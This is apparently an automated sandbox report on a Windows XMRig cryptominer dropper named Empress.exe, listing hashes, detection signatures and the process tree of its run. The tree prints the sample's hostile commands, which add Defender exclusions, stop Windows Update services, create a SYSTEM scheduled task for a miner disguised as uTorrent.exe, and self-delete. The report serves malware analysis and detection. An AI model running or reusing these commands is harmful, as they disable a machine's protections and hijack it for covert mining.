Analysis
-
max time kernel
304s -
max time network
316s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
-
submitted
27/08/2023, 19:57
General
-
Target
Empress/Empress.exe
-
Size
680.4MB
-
MD5
b7b4e0558eb6188abc6e17d77abb4f73
-
SHA1
22851c79469486055efc62599a25eb4e1f8cc8b1
-
SHA256
998997122e364144750a72db4049d50e38e6a879b0c67bd92ff5f6a549c7f2f5
-
SHA512
638827eb702d032bf9f045854c1a79cd3bb841c9147ddd66fce98d91072bcd67338ae7214a248f8b0c8e43a68c8af48d2991a5ecae9df4e35666cf0477529cc3
-
SSDEEP
196608:gomVwAoiSs79XEVmNmbGHDoKUrUNQ9SzsIW8YtuNfU/:goqwAoSREVmDjzfIuNfU/
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 5 IoCs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 3 IoCs
-
Themida packer 22 IoCs
Detects Themida, an advanced Windows software protection system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 52 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 37 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Empress\Empress.exe"C:\Users\Admin\AppData\Local\Temp\Empress\Empress.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\[New]3.exeC:\Users\Admin\AppData\Roaming\[New]3.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Roaming\[New]crypted.exeC:\Users\Admin\AppData\Roaming\[New]crypted.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 9965⤵
- Program crash
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kssonkvq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'AppData' /tr '''C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'AppData' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\[New]3.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "AppData"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kssonkvq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'AppData' /tr '''C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'AppData' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
-
-
C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe"C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 780 -ip 7801⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
678.7MB
MD55a0bccfe6d74400f7d85d1fdde17d0cb
SHA152651d2bb9d43087173d43f35bb10cece676e1b1
SHA256794eb5198ce2e7b8dae24bad2c4f4ff22beec2930df07c086fc61ec6d72aeb99
SHA5122bc7126650008c9ff26a0a155132598ab614208499d75900f94141e6a526c2fa2c0823ce108f70f3ac92249d0cb68961dd5c0bc1f4180e72d09815c46ed3abeb
-
Filesize
678.7MB
MD55a0bccfe6d74400f7d85d1fdde17d0cb
SHA152651d2bb9d43087173d43f35bb10cece676e1b1
SHA256794eb5198ce2e7b8dae24bad2c4f4ff22beec2930df07c086fc61ec6d72aeb99
SHA5122bc7126650008c9ff26a0a155132598ab614208499d75900f94141e6a526c2fa2c0823ce108f70f3ac92249d0cb68961dd5c0bc1f4180e72d09815c46ed3abeb
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5bd5940f08d0be56e65e5f2aaf47c538e
SHA1d7e31b87866e5e383ab5499da64aba50f03e8443
SHA2562d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5KB
MD5071b8b89dc3e6f10120315d86accddc8
SHA1e0c98b14dec0fadb523e4a86cac778cc86841fc6
SHA256fde9d2f2d64da4e88b2e71d31e8a1792d91734b223c7cfc45e11d16f507af610
SHA51221705562130d396cb48630fee61665cd6a2aa99ee94b55340537e8a7d43be10ee2aa835854624d90e3b6417190253de5fe947f27529a9a768b2701d8eeee37fd
-
Filesize
4KB
MD54d469fcd07d1ee0a57b64c5ad3a80d22
SHA117b0b8600cbe0015c1d3792a05cd5faa69e986e2
SHA2568a90a8506281a7c79e22c746bb5c0e1900753905d39c3b2cf075889f12566f49
SHA5120722c29314d54ec23cee1a7e53009ac9295f54aeb5a59760181233c38c8ef96ce5e141915e20b4ae5c6f1efea13b7952698881fa5e7bed7d7ea7d77047b847a6
-
Filesize
13B
MD552e2479d75e086f9c280ec6ab5ae4fe6
SHA12750d987041c869ebc4be655f31b5803a677fb8b
SHA2567f4007c917578896645f1844af5459e9218c709da14c5465e687ca61604a3de6
SHA512d74deb991dcc9c83c86989040405752caefc9313e5f20ca64fcf1c96a278bfd381ebf58e7ac9fc67aea0e699bdaa915319945ab7a1a0daab3ba4279f9774d1ff
-
Filesize
678.7MB
MD55a0bccfe6d74400f7d85d1fdde17d0cb
SHA152651d2bb9d43087173d43f35bb10cece676e1b1
SHA256794eb5198ce2e7b8dae24bad2c4f4ff22beec2930df07c086fc61ec6d72aeb99
SHA5122bc7126650008c9ff26a0a155132598ab614208499d75900f94141e6a526c2fa2c0823ce108f70f3ac92249d0cb68961dd5c0bc1f4180e72d09815c46ed3abeb
-
Filesize
678.7MB
MD55a0bccfe6d74400f7d85d1fdde17d0cb
SHA152651d2bb9d43087173d43f35bb10cece676e1b1
SHA256794eb5198ce2e7b8dae24bad2c4f4ff22beec2930df07c086fc61ec6d72aeb99
SHA5122bc7126650008c9ff26a0a155132598ab614208499d75900f94141e6a526c2fa2c0823ce108f70f3ac92249d0cb68961dd5c0bc1f4180e72d09815c46ed3abeb
-
Filesize
672.2MB
MD5fe278bbf875f16367f5277e2cdf77378
SHA1c46596c43c1a7084fa680c07ce4c7d120396f009
SHA2565015ac560225bffcb4d4131d3920213ac3d2ab6a2a2341756cb035ddfe46a7d5
SHA512c147f9200cea46689e3109758aa2b57d5e2d5c77ffe568ad544548344b41c4a240a5aaddeeb6a6489deb1b4367b6a7bba42d7b2dbf8b9c17fb6c9a2ec793f60a
-
Filesize
672.2MB
MD5fe278bbf875f16367f5277e2cdf77378
SHA1c46596c43c1a7084fa680c07ce4c7d120396f009
SHA2565015ac560225bffcb4d4131d3920213ac3d2ab6a2a2341756cb035ddfe46a7d5
SHA512c147f9200cea46689e3109758aa2b57d5e2d5c77ffe568ad544548344b41c4a240a5aaddeeb6a6489deb1b4367b6a7bba42d7b2dbf8b9c17fb6c9a2ec793f60a
-
Filesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
Filesize
1KB
MD54af092e31db1384ca141f50e2754eeea
SHA15e6e8c987ed9df9c9bb373227c2c8dcfde24ccef
SHA25660e3e9177b248839a957af720477f1389a10334123eb6cb12ae347e40ab53f53
SHA512a4ac31719fcb1b0b594806b5d56fc2c335de7901538542aeffe0f78b9710aa5aecc78146ab5d131d32b56405df59c4f2be50bcafb7494d4996c154b39f8bf4fd
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
120KB
-
Filesize
408KB
-
Filesize
5.6MB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
584KB
-
Filesize
72KB
-
Filesize
40KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
40KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
40KB
-
Filesize
24KB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
112KB
-
Filesize
40KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
112KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
14.8MB
-
Filesize
2.0MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
2.0MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
2.0MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
2.0MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
128KB
-
Filesize
7.9MB
-
Filesize
7.9MB
-
Filesize
7.9MB
-
Filesize
7.9MB